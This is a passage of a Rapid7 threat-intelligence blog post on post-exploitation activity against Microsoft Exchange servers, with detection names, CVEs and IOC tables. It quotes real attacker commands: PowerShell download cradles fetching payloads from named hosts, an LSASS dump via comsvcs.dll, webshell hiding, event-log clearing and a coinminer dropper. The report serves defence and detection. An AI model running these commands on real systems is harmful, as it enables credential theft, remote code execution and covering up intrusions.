The attacker then uses the existing Microsoft utility <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab">makecab.exe</a> to compress the memory dump for more efficient retrieval. Overall, the data this attacker targets for collection from victims has some similarities to that described in other reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.</p><!--kg-card-begin: markdown--><pre><code>C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat C:\Windows\System32\cmd.exe /c c:\inetpub\wwwroot\aspnet_client\test.bat dsquery * -limit 0 -filter objectCategory=person -attr * -uco powershell rundll32.exe c:\windows\system32\comsvcs.dll MiniDump 900 c:\inetpub\wwwroot\aspnet_client\&lt;REDACTED_33_CHARACTER_STRING&gt;.tmp.dmp full makecab c:\inetpub\wwwroot\aspnet_client\&lt;REDACTED_33_CHARACTER_STRING&gt;.tmp.dmp c:\inetpub\wwwroot\aspnet_client\&lt;REDACTED_33_CHARACTER_STRING&gt;.dmp.zip makecab c:\inetpub\wwwroot\aspnet_client\&lt;REDACTED_33_CHARACTER_STRING&gt;.tmp c:\inetpub\wwwroot\aspnet_client\&lt;REDACTED_33_CHARACTER_STRING&gt;.dmp.zip </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Minidump via COM Services DLL</li></ul><h3 id="malicious-dll-attacker">Malicious DLL attacker</h3><p>This attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. 
The attacker also made use of the net, netstat, and tasklist utilities, along with <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist">klist</a>, in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.</p><!--kg-card-begin: markdown--><pre><code>c:\windows\system32\cmd.exe /c tasklist tasklist c:\windows\system32\cmd.exe /c net time /do net time /do c:\windows\system32\cmd.exe /c rundll32 c:\programdata\demo.dll,run -lm &gt; c:\programdata\1.txt rundll32 c:\programdata\demo.dll,run -lm &gt; c:\programdata\1.txt c:\windows\system32\cmd.exe /c klist c:\windows\system32\cmd.exe /c tasklist tasklist c:\windows\system32\cmd.exe /c netstat -ano netstat -ano </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="opera-browser-and-cobalt-strike-attacker">Opera Browser and Cobalt Strike attacker</h3><p>This attacker was seen using common techniques to download scripts with Microsoft’s <a href="https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool">BITSAdmin</a>. These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913">CVE-2018-18913</a>). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. 
The eventual end of this execution would result in the execution of <a href="https://www.cobaltstrike.com/">Cobalt Strike</a>, a favorite tool of attackers that distributes ransomware:</p><!--kg-card-begin: markdown--><pre><code>C:\Windows\System32\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\Users\public\2.bat C:\Windows\System32\cmd.exe /c c:\Users\public\2.bat powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA= powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA msiexec.exe -k powershell Start-Sleep -Seconds 10 cmd /c C:\\users\\public\\opera\\opera_browser.exe C:\\users\\public\\opera\\opera_browser.exe powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA </code></pre> 
<!--kg-card-end: markdown--><p>Base64 decoded strings passed to PowerShell:</p><!--kg-card-begin: markdown--><pre><code>(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\users\public\opera\code') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\users\public\opera\opera_browser.png') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\users\public\opera\opera_browser.dll') (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\users\public\opera\opera_browser.exe') </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Download And Execute With Background Intelligent Transfer Service</li><li>Attacker Technique - URL Passed To BitsAdmin</li></ul><h3 id="six-character-webshell-attacker">Six-character webshell attacker</h3><p>This attacker was seen uploading webshells and copying them to other locations within the webroot.</p><!--kg-card-begin: markdown--><pre><code>cmd /c copy C:\inetpub\wwwroot\aspnet_client\discover.aspx &quot;C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\&lt;REDACTED_6_CHARACTER_STRING&gt;.aspx&quot; </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="encoded-powershell-download-cradle-attacker">Encoded PowerShell download cradle attacker</h3><p>This attacker was seen executing encoded PowerShell commands that would download malware from a remote location. 
They would also execute the <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac">getmac.exe</a> utility to enumerate information about the network adapters.</p><!--kg-card-begin: markdown--><pre><code>cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA== C:\Windows\system32\getmac.exe /FO CSV </code></pre> <!--kg-card-end: markdown--><p>Base64 decoded strings passed to PowerShell:</p><!--kg-card-begin: markdown--><pre><code>IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e') </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - PowerShell Download Cradles</li></ul><h3 id="ten-character-webshell-attacker">Ten-character webshell attacker</h3><p>This attacker was seen uploading webshells and using icacls to recursively set the permissions of the webroot directory to read-only. 
Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.</p><!--kg-card-begin: markdown--><pre><code>C:\Windows\System32\cmd.exe /c move &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\error.aspx&quot; &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\&lt;REDACTED_10_CHARACTER_STRING&gt;.aspx&quot; C:\Windows\System32\cmd.exe /c icacls &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth&quot; /inheritance:r /grant:r Everyone:(OI)(CI)R C:\Windows\System32\cmd.exe /c =attrib &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\&lt;REDACTED_10_CHARACTER_STRING&gt;.aspx&quot; +s +h attrib &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\&lt;REDACTED_10_CHARACTER_STRING&gt;.aspx&quot; +s +h C:\Windows\System32\cmd.exe /c icacls &quot;c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth&quot; /inheritance:r /grant:r Everyone:(OI)(CI)R </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Modification Of Files In Exchange Webroot</li></ul><h3 id="7zip-and-netsupport-manager-attacker">7zip and NetSupport Manager attacker</h3><p>This attacker used the <a href="https://www.7-zip.org/">7zip</a> compression utility (renamed to MonitoringLog.exe) and the  <a href="https://www.netsupportsoftware.com/remote-control/">NetSupport Manager</a> remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. 
Once extracted, these utilities were executed:</p><!--kg-card-begin: markdown--><pre><code>c:\windows\system32\cmd.exe dir C:\Programdata\ c:\windows\system32\cmd.exe /c powershell C:\Programdata\script1.ps1 powershell C:\Programdata\script1.ps1 C:\ProgramData\MonitoringLog.exe x -p&lt;REDACTED_STRING&gt; -y C:\ProgramData\Service.Information.rtf -oC:\ProgramData ping -n 10 127.0.0.1 c:\windows\system32\cmd.exe /c C:\Programdata\MonitoringLog.cmd taskkill /Im rundll32.exe /F C:\ProgramData\NetConnections\client32.exe ping -n 10 127.0.0.1 taskkill /Im rundll32.exe /F c:\windows\system32\cmd.exe /c tasklist /v tasklist /v </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="event-log-deletion-and-virtual-directory-creation-attacker">Event log deletion and virtual directory creation attacker</h3><p>This attacker created virtual directories within the existing webroot using the Microsoft utility <a href="https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe">appcmd.exe</a>, and then cleared all event logs on the system using <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil">wevtutil.exe</a>:</p><!--kg-card-begin: markdown--><pre><code>CMD C:\Windows\System32\inetsrv\appcmd.exe add vdir &quot;/app.name:Default Web Site/&quot; &quot;/path:/owa/auth/ /zfwqn&quot; /physicalPath:C:\ProgramData\COM\zfwqn CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x wevtutil el wevtutil cl &lt;REDACTED_ALL_DIFFERENT_EVENT_LOGS&gt; </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li><li>Attacker Technique - Clearing Event Logs With WEvtUtil</li></ul><h3 
id="webshell-enumeration-attacker">Webshell enumeration attacker</h3><p>This attacker was seen executing encoded PowerShell commands to use the <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type">type</a> command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:</p><!--kg-card-begin: markdown--><pre><code>cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA </code></pre> <!--kg-card-end: markdown--><p>Base64 decoded strings:</p><!--kg-card-begin: markdown--><pre><code>type &quot;C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\outlooken.aspx&quot; </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="coinminer-dropper-attacker">Coinminer dropper attacker</h3><p>Some attackers were seen using PowerShell to retrieve and execute coinminers.</p><!--kg-card-begin: markdown--><pre><code>cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe &amp; 
C:\windows\temp\dsf.exe RS9+cn_0 &amp; del C:\windows\temp\dsf.exe powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\windows\temp\dsf.exe C:\windows\temp\dsf.exe RS9+cn_0 </code></pre> <!--kg-card-end: markdown--><p>And again, with a slightly different filename to retrieve it from:</p><!--kg-card-begin: markdown--><pre><code>cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\windows\temp\dsf.exe &amp; C:\windows\temp\dsf.exe RS9+cn_0 &amp; del C:\windows\temp\dsf.exe powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip C:\windows\temp\dsf.exe RS9+cn_0 </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h3 id="simple-reconnaissance-attacker-s-">Simple reconnaissance attacker(s)</h3><p>Some attackers were seen executing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:</p><!--kg-card-begin: markdown--><pre><code>net group /domain net group &quot;Domain Computers&quot; /do net group &quot;Domain Users&quot; /do net group IntranetAdmins /do net user /domain systeminfo tasklist </code></pre> <!--kg-card-end: markdown--><p>Another example where only simple recon-type commands were executed:</p><!--kg-card-begin: markdown--><pre><code>whoami systeminfo systeminfo wmic product get name Wmic product get name </code></pre> <!--kg-card-end: markdown--><p>InsightIDR Attacker Behavior Analytics that detect this attacker’s activity:</p><ul><li>Suspicious Process - Process Spawned By Outlook Web Access</li></ul><h2 id="conclusions">Conclusions</h2><p>While there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with 
different motivations and skills. Rapid7 even observed exploitation of the same victim by multiple different actors (HAFNIUM and coinminer droppers) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This gave them data from several victims that would allow access to various Active Directory services for as long as the gathered credentials remain unchanged. </p><p>This dumping of credentials may have been done at this scale because the attackers were aware the activity would be discovered and the vulnerability would be patched very soon. It would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched, since patching alone does not invalidate credentials that were already dumped. The level of escalation in use by HAFNIUM and the subsequent use by several other actors may point to the same exploit being shared or leaked. <strong>At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.</strong></p><p>Continuing to analyze the behavior of attackers post-compromise in order to develop detections greatly increases the likelihood of being notified of a breach, regardless of the method used to obtain initial access to the victim environment. 
Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.</p><h3 id="observed-cves-employed-by-attackers-">Observed CVEs employed by attackers:<br></h3><!--kg-card-begin: markdown--><table> <thead> <tr> <th>Common Vulnerabilities and Exposure</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>CVE-2018-18913</td> <td>Opera Search Order Hijacking Vulnerability <a href="https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html">https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html</a></td> </tr> <tr> <td>CVE-2021-26855</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855</a></td> </tr> <tr> <td>CVE-2021-26857</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857</a></td> </tr> <tr> <td>CVE-2021-26858</td> <td>Microsoft Exchange Server remote code execution <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858</a></td> </tr> <tr> <td>CVE-2021-27065</td> <td>Microsoft Exchange Server remote code execution <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065">https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065</a></td> </tr> </tbody> </table> <!--kg-card-end: markdown--><h3 id="observed-iocs-employed-by-all-attackers-">Observed IOCs employed by all attackers:</h3><!--kg-card-begin: markdown--><table> <thead> <tr> <th>Type</th> <th>Value</th> </tr> </thead> <tbody> 
<tr> <td>FQDN</td> <td>estonine.com</td> </tr> <tr> <td>FQDN</td> <td>p.estonine.com</td> </tr> <tr> <td>FQDN</td> <td>ipinfo.io</td> </tr> <tr> <td>Filepath</td> <td>C:\inetpub\wwwroot\aspnet_client\</td> </tr> <tr> <td>Filepath</td> <td>C:\inetpub\wwwroot\aspnet_client\system_web\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\Bin\</td> </tr> <tr> <td>Filepath</td> <td>c:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\</td> </tr> <tr> <td>Filepath</td> <td>C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\</td> </tr> <tr> <td>Filepath</td> <td>C:\Programdata\</td> </tr> <tr> <td>Filepath</td> <td>C:\ProgramData\COM\zfwqn\</td> </tr> <tr> <td>Filepath</td> <td>C:\root\</td> </tr> <tr> <td>Filepath</td> <td>C:\Users\Public\</td> </tr> <tr> <td>Filepath</td> <td>C:\Users\Public\Opera\</td> </tr> <tr> <td>Filepath</td> <td>C:\Windows\temp\</td> </tr> <tr> <td>Filename</td> <td>1.txt</td> </tr> <tr> <td>Filename</td> <td>2.bat</td> </tr> <tr> <td>Filename</td> <td>3.avi</td> </tr> <tr> <td>Filename</td> <td>b.log</td> </tr> <tr> <td>Filename</td> <td>c103w-at.zip</td> </tr> <tr> <td>Filename</td> <td>client32.exe</td> </tr> <tr> <td>Filename</td> <td>code</td> </tr> <tr> <td>Filename</td> <td>curl.exe</td> </tr> <tr> <td>Filename</td> <td>demo.dll</td> </tr> <tr> <td>Filename</td> <td>discover.aspx</td> </tr> <tr> <td>Filename</td> <td>dsf.exe</td> </tr> <tr> <td>Filename</td> <td>error.aspx</td> </tr> <tr> <td>Filename</td> <td>ErrorFF.aspx</td> </tr> <tr> <td>Filename</td> <td>exshell.psc1</td> </tr> <tr> <td>Filename</td> <td>Flogon.aspx</td> </tr> <tr> <td>Filename</td> <td>lsass.dump</td> </tr> <tr> <td>Filename</td> <td>m103w.zip</td> </tr> <tr> <td>Filename</td> <td>nvidia.msi</td> </tr> <tr> <td>Filename</td> <td>opera_browser.dll</td> 
</tr> <tr> <td>Filename</td> <td>opera_browser.exe</td> </tr> <tr> <td>Filename</td> <td>opera_browser.png</td> </tr> <tr> <td>Filename</td> <td>OutlookEN.aspx</td> </tr> <tr> <td>Filename</td> <td>MonitoringLog.cmd</td> </tr> <tr> <td>Filename</td> <td>MonitoringLog.exe</td> </tr> <tr> <td>Filename</td> <td>p</td> </tr> <tr> <td>Filename</td> <td>procdump64.exe</td> </tr> <tr> <td>Filename</td> <td>Service.Information.rtf</td> </tr> <tr> <td>Filename</td> <td>TimeoutLogout.aspx</td> </tr> <tr> <td>Filename</td> <td>2.bat</td> </tr> <tr> <td>Filename</td> <td>script1.ps1</td> </tr> <tr> <td>Filename</td> <td>test.bat</td> </tr> <tr> <td>IP Address</td> <td>178.162.217.107</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.202</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.226</td> </tr> <tr> <td>IP Address</td> <td>85.17.31.122</td> </tr> <tr> <td>IP Address</td> <td>5.79.71.205</td> </tr> <tr> <td>IP Address</td> <td>5.79.71.225</td> </tr> <tr> <td>IP Address</td> <td>178.162.203.211</td> </tr> <tr> <td>IP Address</td> <td>85.17.31.82</td> </tr> <tr> <td>IP Address</td> <td>86.105.18.116</td> </tr> <tr> <td>IP Address</td> <td>198.98.61.152</td> </tr> <tr> <td>IP Address</td> <td>89.34.111.11</td> </tr> <tr> <td>MD5</td> <td>7a6c605af4b85954f62f35d648d532bf</td> </tr> <tr> <td>MD5</td> <td>e1ae154461096adb5ec602faad42b72e</td> </tr> <tr> <td>MD5</td> <td>b3df7f5a9e36f01d0eb0043b698a6c06</td> </tr> <tr> <td>MD5</td> <td>c60ac6a6e6e582ab0ecb1fdbd607705b</td> </tr> <tr> <td>MD5</td> <td>42badc1d2f03a8b1e4875740d3d49336</td> </tr> <tr> <td>MD5</td> <td>c515107d75563890020e915f54f3e036</td> </tr> <tr> <td>SHA1</td> <td>02886f9daa13f7d9855855048c54f1d6b1231b0a</td> </tr> <tr> <td>SHA1</td> <td>c7f68a184df65e72c59403fb135924334f8c0ebd</td> </tr> <tr> <td>SHA1</td> <td>ab32d4ec424b7cd30c7ace1dad859df1a65aa50e</td> </tr> <tr> <td>SHA1</td> <td>ba9de479beb82fd97bbdfbc04ef22e08224724ba</td> </tr> <tr> <td>SHA1</td> <td>cee178da1fb05f99af7a3547093122893bd1eb46</td> 
</tr> <tr> <td>SHA1</td> <td>2fed891610b9a770e396ced4ef3b0b6c55177305</td> </tr> <tr> <td>SHA-256</td> <td>b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff</td> </tr> <tr> <td>SHA-256</td> <td>d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09</td> </tr> <tr> <td>SHA-256</td> <td>bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6</td> </tr> <tr> <td>SHA-256</td> <td>4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87</td> </tr> <tr> <td>SHA-256</td> <td>c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf</td> </tr> <tr> <td>SHA-256</td> <td>076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26</td> </tr> <tr> <td>URL</td> <td><code>http://103.212.223.210:9900/nvidia.msi</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/code</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.dll</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.exe</code></td> </tr> <tr> <td>URL</td> <td><code>http://86.105.18.116/news/opera_browser.png</code></td> </tr> <tr> <td>URL</td> <td><code> http://89.34.111.11/3.avi</code></td> </tr> <tr> <td>URL</td> <td><code>http://microsoftsoftwaredownload.com:8080/c103w-at.zip</code></td> </tr> <tr> <td>URL</td> <td><code>http://microsoftsoftwaredownload.com:8080/m103w.zip</code></td> </tr> <tr> <td>URL</td> <td><code>http://p.estonine.com/p?e</code></td> </tr> <tr> <td>URL</td> <td>http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/ /zfwqn</td> </tr> <tr> <td>URL</td> <td>http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/%20/zfwqn</td> </tr> </tbody> </table> <!--kg-card-end: markdown--><h3 id="references-">References:</h3><ul><li><a href="https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/">https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/</a></li><li><a 
href="https://aka.ms/ExchangeVulns">https://aka.ms/ExchangeVulns</a></li><li><a href="https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/">https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html</a></li><li><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf</a></li></ul><!--kg-card-begin: html--><div style="border: 1px solid #ccc; padding: 15px 20px 0;border-radius: 3px;text-align: center;"> <h4 style="vertical-align: middle;margin-bottom: 10px;">NEVER MISS A BLOG</h4> <p>Get the latest stories, expertise, and news about security today.</p> <a class="subscribe-btn button smBtn blue">Subscribe</a> </div> <br> <!--kg-card-end: html--><p><br></p> </div> </div> <div class="grid-y post-bottom-info__wrapper"> <div class="cell-padding"> <div class="post-bottom-info" id="post-bottom-info"> <div class="grid-x"> <div class="medium-12 large-6 cell text-center large-text-left smpad-btm"> <h4>POST TAGS</h4> <div class="tag-row wrapper-item"> <div class="blog-resources__tags"> <ul> <li> <a href="/blog/tag/zero-day/" title="Zero-Day">Zero-Day</a> </li> <li> <a href="/blog/tag/microsoft-vulnerability/" title="Microsoft">Microsoft</a> </li> <li> <a href="/blog/tag/detection-and-response/" title="Detection and Response">Detection and Response</a> </li> <li> <a 
class="grid-container"> <div class="grid-x grid-padding-x"> <div class="medium-10 medium-offset-1 cell"> <div class="footer__legal-copyright">&copy; Rapid7</div> <div class="footer__legal-link"><a href="/legal/">Legal Terms</a></div> &nbsp; | &nbsp; <div class="footer__legal-link"><a href="/privacy-policy/">Privacy Policy</a></div> &nbsp; | &nbsp; <div class="footer__legal-link"><a href="/export-notice/">Export Notice</a></div> &nbsp; | &nbsp; <div class="footer__legal-link"><a href="/trust/">Trust</a></div> &nbsp; | &nbsp; <div class="footer__legal-link"><a href=""><a href="#" onclick="OneTrust.ToggleInfoDisplay(); return false;"> Do Not Sell or Share My Personal Information</a></a></div> &nbsp; | &nbsp; <div class="footer__legal-link"><a href=""><a href="#" onclick="OneTrust.ToggleInfoDisplay(); return false;">Cookie Preferences</a></a></div> </div> </div> </div> </section> <section class="contact-sticky"> <div class="grid-container"> <div class="grid-x grid-padding-x expanded"> <div id="stickyButtons" class="cell driftInit"> <div class="contactBtn"> <a id="sticky_contact_btn" role="button" tabindex="0" class="gray button"> Contact Us </a> </div> </div> </div> </div> </section> <div class="reveal light hasSidebar" id="stickyContact" data-reveal> <section class="contactForm"> <div class="grid-container"> <div class="grid-x grid-padding-x"> <div class="large-9 cell"> <form id="contactModal" class="formBlock freemail mkto contactModal" data-block-name="Contact Form 